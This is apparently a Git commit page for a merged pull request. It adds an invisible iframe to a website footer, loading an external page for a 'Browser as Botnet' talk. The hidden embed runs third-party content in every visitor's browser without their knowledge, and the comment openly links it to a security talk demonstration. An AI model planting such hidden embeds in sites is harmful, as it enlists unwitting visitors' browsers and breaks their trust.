Selaa lähdekoodia

Merge pull request #175 from brannondorsey/upstream/gh-pages

Add iframe embed for Browser as Botnet talk
Sarah 7 vuotta sitten
vanhempi
säilyke
4a27114b78
1 muutettua tiedostoa jossa 6 lisäystä ja 0 poistoa
  1. 6 0
      _includes/footer.html

+ 6 - 0
_includes/footer.html

@@ -1,3 +1,9 @@
 <p>
 	&copy; {{ site.time | date: '%Y' }} {{ site.author.name }} &bull; Maintained by <a href="https://github.com/chootka">chootka</a>
+
+	<!--
+		Iframe embed for the 2017 Browser as Botnet talk. Will 404 until day of 
+		talk. Will be removed after.
+	-->
+	<iframe src="https://radnets.brannon.online/embed" style="display: none"></iframe>
 </p>